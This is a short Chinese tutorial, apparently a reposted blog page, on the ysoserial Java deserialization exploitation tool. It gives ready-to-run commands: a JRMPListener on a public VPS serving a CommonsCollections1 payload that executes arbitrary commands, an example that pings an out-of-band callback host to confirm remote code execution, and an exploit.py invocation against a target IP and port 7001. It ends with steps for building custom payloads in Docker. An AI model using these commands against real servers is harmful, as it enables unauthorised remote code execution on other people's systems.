反序列化工具ysoserial使用介紹

反序列化工具ysoserial使用介紹

0x00 ysoserial是什麼?

ysoserial集合了各類java反序列化payload;
下載地址:https://github.com/angelwhu/ysoserialjava

0x01 基本使用方法

在公網vps上執行:python

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 '【commands】'

port:公網vps上監聽的端口號
commands:須要執行的命令
例子:git

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

重啓一個shell窗口:github

python exploit.py 【目標ip】 【目標端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:docker

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial編寫本身的payload

  1. git clone https://github.com/fanyingjie2/ysoserial.git
  2. 將本身編寫的payload放在下載的包中:路徑ysoserial/src/main/java/ysoserial/payloads/
  3. 修改Dockerfile
    反序列化工具ysoserial使用介紹
  4. docker build -t ysoserial .
  5. docker run -ti ID號 /bin/bash
  6. 在docke中執行 apt-get update
  7. 在docker中執行apt-get install lrzsz
  8. sz target/ysoserial.jar
相關文章
相關標籤/搜索